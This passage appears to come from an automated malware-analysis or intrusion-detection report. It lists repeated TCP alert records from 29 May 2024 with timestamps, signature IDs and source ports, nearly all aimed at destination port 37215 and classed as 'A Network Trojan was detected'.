                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963927
                SID:2829579
                Source Port:52542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825932
                SID:2829579
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762860
                SID:2829579
                Source Port:46174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559915
                SID:2835222
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788581
                SID:2829579
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232580
                SID:2829579
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507226
                SID:2829579
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512283
                SID:2835222
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042538
                SID:2835222
                Source Port:36318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179655
                SID:2829579
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180253
                SID:2835222
                Source Port:33786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141015
                SID:2835222
                Source Port:40408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969712
                SID:2829579
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734599
                SID:2835222
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951281
                SID:2835222
                Source Port:46674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925430
                SID:2829579
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916717
                SID:2835222
                Source Port:60002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972250
                SID:2829579
                Source Port:57440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015878
                SID:2835222
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359865
                SID:2835222
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276647
                SID:2835222
                Source Port:41854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910821
                SID:2829579
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664457
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773032
                SID:2829579
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418421
                SID:2829579
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719441
                SID:2829579
                Source Port:40222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027977
                SID:2835222
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.359886
                SID:2829579
                Source Port:42660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287517
                SID:2835222
                Source Port:42956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321347
                SID:2835222
                Source Port:35454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779675
                SID:2829579
                Source Port:57238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897202
                SID:2835222
                Source Port:48946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657749
                SID:2835222
                Source Port:44966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175655
                SID:2835222
                Source Port:38006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263636
                SID:2835222
                Source Port:47802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868201
                SID:2835222
                Source Port:54652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.755709
                SID:2030490
                Source Port:55710
                Destination Port:1235
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362772
                SID:2835222
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817144
                SID:2829579
                Source Port:38668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047302
                SID:2835222
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532174
                SID:2835222
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908906
                SID:2829579
                Source Port:51030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385800
                SID:2829579
                Source Port:49388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010335
                SID:2829579
                Source Port:47804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620350
                SID:2835222
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266392
                SID:2829579
                Source Port:46480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649668
                SID:2829579
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992999
                SID:2829579
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517843
                SID:2829579
                Source Port:39176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561712
                SID:2829579
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239447
                SID:2835222
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712936
                SID:2835222
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948464
                SID:2835222
                Source Port:37336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001340
                SID:2835222
                Source Port:46058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586867
                SID:2829579
                Source Port:47538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178305
                SID:2829579
                Source Port:54566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649702
                SID:2835222
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630099
                SID:2829579
                Source Port:38584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853168
                SID:2835222
                Source Port:39174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818195
                SID:2835222
                Source Port:51730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927696
                SID:2835222
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429458
                SID:2835222
                Source Port:55828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968494
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288296
                SID:2829579
                Source Port:58896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950966
                SID:2835222
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074508
                SID:2835222
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767070
                SID:2829579
                Source Port:43802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517918
                SID:2835222
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711911
                SID:2829579
                Source Port:43732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.689657
                SID:2835222
                Source Port:38478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816811
                SID:2829579
                Source Port:48676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518229
                SID:2829579
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797956
                SID:2835222
                Source Port:47742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669479
                SID:2829579
                Source Port:46746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986048
                SID:2835222
                Source Port:48932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.895960
                SID:2829579
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364746
                SID:2829579
                Source Port:59350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885509
                SID:2829579
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080783
                SID:2829579
                Source Port:48826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178786
                SID:2829579
                Source Port:47330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569360
                SID:2829579
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928922
                SID:2829579
                Source Port:59526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856144
                SID:2829579
                Source Port:60452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802297
                SID:2835222
                Source Port:44816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968700
                SID:2835222
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364658
                SID:2835222
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964468
                SID:2829579
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208191
                SID:2829579
                Source Port:50774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042925
                SID:2835222
                Source Port:57998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949468
                SID:2835222
                Source Port:59338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567398
                SID:2835222
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466286
                SID:2835222
                Source Port:58186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141381
                SID:2829579
                Source Port:48354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900168
                SID:2829579
                Source Port:56616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668088
                SID:2829579
                Source Port:34796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562207
                SID:2829579
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786699
                SID:2835222
                Source Port:55804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422390
                SID:2829579
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287157
                SID:2829579
                Source Port:33156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182428
                SID:2829579
                Source Port:48958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987066
                SID:2835222
                Source Port:56528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462282
                SID:2829579
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815620
                SID:2829579
                Source Port:44738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833534
                SID:2835222
                Source Port:58198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261600
                SID:2829579
                Source Port:50054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929986
                SID:2829579
                Source Port:39092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899536
                SID:2829579
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667216
                SID:2835222
                Source Port:39540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133020
                SID:2829579
                Source Port:60286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178326
                SID:2829579
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155006
                SID:2829579
                Source Port:53400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782582
                SID:2835222
                Source Port:49540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536721
                SID:2829579
                Source Port:44064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532282
                SID:2829579
                Source Port:55580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511478
                SID:2835222
                Source Port:53946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584285
                SID:2835222
                Source Port:59242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557266
                SID:2829579
                Source Port:37406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654832
                SID:2829579
                Source Port:43598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416784
                SID:2829579
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624662
                SID:2829579
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989696
                SID:2835222
                Source Port:43964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948082
                SID:2835222
                Source Port:39726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149308
                SID:2835222
                Source Port:52700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289895
                SID:2829579
                Source Port:54046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787118
                SID:2835222
                Source Port:38716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929151
                SID:2829579
                Source Port:60982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274455
                SID:2835222
                Source Port:57904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946847
                SID:2829579
                Source Port:54328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459414
                SID:2829579
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821136
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149923
                SID:2829579
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317970
                SID:2835222
                Source Port:33572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767043
                SID:2835222
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178169
                SID:2829579
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361421
                SID:2835222
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914596
                SID:2829579
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160265
                SID:2829579
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432082
                SID:2835222
                Source Port:39496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843207
                SID:2835222
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653103
                SID:2829579
                Source Port:39366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583915
                SID:2829579
                Source Port:34952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781279
                SID:2835222
                Source Port:44856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951119
                SID:2835222
                Source Port:51464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902175
                SID:2835222
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233693
                SID:2835222
                Source Port:44104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992970
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789225
                SID:2835222
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277478
                SID:2835222
                Source Port:53036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963303
                SID:2829579
                Source Port:52526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779566
                SID:2835222
                Source Port:48048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125216
                SID:2829579
                Source Port:51646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001311
                SID:2835222
                Source Port:45772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072774
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221412
                SID:2835222
                Source Port:48038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263118
                SID:2829579
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625289
                SID:2835222
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261479
                SID:2835222
                Source Port:52036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944135
                SID:2835222
                Source Port:41508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557034
                SID:2829579
                Source Port:42616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780791
                SID:2829579
                Source Port:48610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890951
                SID:2829579
                Source Port:48102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025115
                SID:2829579
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091345
                SID:2835222
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557343
                SID:2835222
                Source Port:60996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776875
                SID:2829579
                Source Port:53750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576533
                SID:2829579
                Source Port:41790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361716
                SID:2829579
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088062
                SID:2835222
                Source Port:36054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881619
                SID:2835222
                Source Port:51024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292110
                SID:2835222
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652007
                SID:2829579
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.827873
                SID:2829579
                Source Port:44908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039216
                SID:2835222
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418140
                SID:2835222
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673412
                SID:2835222
                Source Port:37158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567699
                SID:2835222
                Source Port:41586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841271
                SID:2829579
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535293
                SID:2835222
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175121
                SID:2835222
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962362
                SID:2829579
                Source Port:58628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781967
                SID:2835222
                Source Port:36428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174890
                SID:2829579
                Source Port:50970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273785
                SID:2829579
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781611
                SID:2829579
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180580
                SID:2829579
                Source Port:39258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231563
                SID:2829579
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860734
                SID:2829579
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025206
                SID:2829579
                Source Port:53838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845678
                SID:2835222
                Source Port:47594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319520
                SID:2829579
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617284
                SID:2829579
                Source Port:37074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912406
                SID:2829579
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217782
                SID:2835222
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779318
                SID:2829579
                Source Port:50866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977202
                SID:2829579
                Source Port:59930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969700
                SID:2835222
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176198
                SID:2829579
                Source Port:48992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
